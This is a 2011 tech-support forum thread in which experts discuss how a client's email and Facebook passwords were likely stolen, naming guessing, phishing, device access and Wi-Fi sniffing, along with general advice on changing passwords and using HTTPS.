Solved

How did client's e-mail password compromised?

Posted on 2011-03-08
11
561 Views
Last Modified: 2013-11-22

One of my clients had a bit of a nightmare recently. He lost access to his facebook account, re-attained access and then promptly lost it again. The perp posted on his wall, added his own e-mail account and then removed the clients. He posted his e-mail password on his facebook wall.

I'm trying to ascertain what a plausible explanation is for how the client's e-mail password was compromised.

Antivirus was out of date by 5 months
Java was about 4-6 revisions behind what's current
Flash was probably 3-4 revisions behind
3 adhoc networks had been connected to in the past
E-Mail was in Outlook
Has a blackberry

I scanned the computer using malwarebytes. Then I removed the hdd and scanned with Kaspersky, then Avast, then Avira. Malwarebytes found some infection fragments. The other three found bits and pieces of java related exploits and trojans. However, no specific keyloggers were found.

I have been trying to ascertain whether the e-mail password was compromised through the adhoc networks, through the blackberry, through infection, or through physical access to the computer?
0
Comment
Question by:MJCS
  • 4
  • 2
  • 2
  • +3
11 Comments
 
LVL 82

Expert Comment

by:Dave Baldwin
ID: 35077709
You forgot guessing and looking over his shoulder.  Since the perp is taking personal and not necessarily financial actions, it's probably someone who knows him.  'Professional' thieves would more likely prefer that he didn't know he was compromised.
0
 
LVL 18

Expert Comment

by:Rartemass
ID: 35078550
If the password was simple then it could have been guessed. This also points to someone he knows.
This is why its important to never use birthdays, pet names, kids names, street names, favourite characters and movies etc.
Also does he write the passwords down and "hide" them at his desk? Many people put a post it note under their keyboard with their passwords and think its secure.
0
 
LVL 38

Expert Comment

by:younghv
ID: 35081430
"...or through physical access to the computer?" = or they got their hands on his BlackBerry for a couple of minutes.

People get way too casual about protecting access to their hand helds - and yet they will store information in them that is every bit as critical as what they have on their PC's.
0
 
LVL 2

Author Comment

by:MJCS
ID: 35083765
how easy is it to pull password info out of a blackberry? I know it is really easy to pull it out of a laptop. There are numerous utilities that could be downloaded and run directly or off of a usb stick.
0
 
LVL 38

Expert Comment

by:younghv
ID: 35085456
Very easy.
Just Google "lost blackberry password" and see all the ways you can do it.
0
6 Surprising Benefits of Threat Intelligence

All sorts of threat intelligence is available on the web. Intelligence you can learn from, and use to anticipate and prepare for future attacks.

 
LVL 2

Author Comment

by:MJCS
ID: 35085526
DO you have any specific links? When I ran that search, general consensus seemed to be that you can reset your blackberry password but not retrieve it...
0
 
LVL 61

Expert Comment

by:btan
ID: 35114474
probably the simple password would be one but it can be easily siphoned as well. Check out this link and mostly the phishing attack would social engineered the user in form of email with link to their phished (spoofed) facebook login. User being unaware will enter the credentials and all those are stored in the hosted attacker fake website

there would be case for "forget password" where user email account (also facebook userid) would be hacked if it is using simple password etc. The "forget password" in facebook will send it to user's primary email account (in this case probably user's facebook userid). attacker got that new facebook password. Also note that sometimes, the "reminder" question in the event of forgetting password can be easily guessed as well e.g. who is the spouse etc - as typically the answer can be found if the user had social information widely available in the web

Nonetheless, I understand that Facebook has security feature in which after 25 or so logins the account is temporarily disabled,to enable the account the account owner must reset his/her account. That may be indirect trigger

for the adhoc network, you should check out firesheep which siphon credentials by hijacking cookie across unprotected WIFI network in hotspot etc. It simply can login to any facebook account without  password. The only effective fix for this problem is full end-to-end encryption, known on the web as HTTPS or SSL. See this link @ http://codebutler.com/firesheep

0
 
LVL 1

Expert Comment

by:Tony_the_PC-Tuner
ID: 35129672
The easiest way to hijack a password is through simple phishing.

The client gets an email from someone that says "you have a new message on XYZ website (Facebook, Craigslist, whatever).  

They click on the "look alike" site, and attempt to login to their account.  Their username and password is captured, and the account is instantly compromised.  The hacker who set up the look-alike site gets an alert that he's caught a fly, goes in and changes the real password on the real account.


Start your investigation there.


Your client should go in and immediately change all remaining passwords to every other account they own- and I mean EVERYTHING; bank passwords, ebay, Amazon, whatever.  Change them now, as the hacker may be in the process of analyzing and digesting whatever they have already compromised.
0
 
LVL 2

Accepted Solution

by:
MJCS earned 0 total points
ID: 35140119
I have figured this out. I have successfully tested a sniffer to intercept non-encrypted wireless traffic to accurately depict passwords on both non-encrypted websites as well as pop e-mail.

How do I close the question with no points given out?
0
 
LVL 18

Expert Comment

by:Rartemass
ID: 35143233
To close with no points, simply select your comment as the solution.
0
 
LVL 2

Author Closing Comment

by:MJCS
ID: 35174635
Nobody gave me a plausible answer but I was able eventually to duplicate the process myself, therefore answering my own question.
0

Featured Post

Enabling OSINT in Activity Based Intelligence

Activity based intelligence (ABI) requires access to all available sources of data. Recorded Future allows analysts to observe structured data on the open, deep, and dark web.

Join & Write a Comment

Ransomware continues to be a growing problem for both personal and business users alike and Antivirus companies are still struggling to find a reliable way to protect you from this dangerous threat.
Find out what Office 365 Transport Rules are, how they work and their limitations managing Office 365 signatures.
Sending a Secure fax is easy with eFax Corporate (http://www.enterprise.efax.com). First, Just open a new email message.  In the To field, type your recipient's fax number @efaxsend.com. You can even send a secure international fax — just include t…
Get a first impression of how PRTG looks and learn how it works.   This video is a short introduction to PRTG, as an initial overview or as a quick start for new PRTG users.

760 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question

Need Help in Real-Time?

Connect with top rated Experts

22 Experts available now in Live!

Get 1:1 Help Now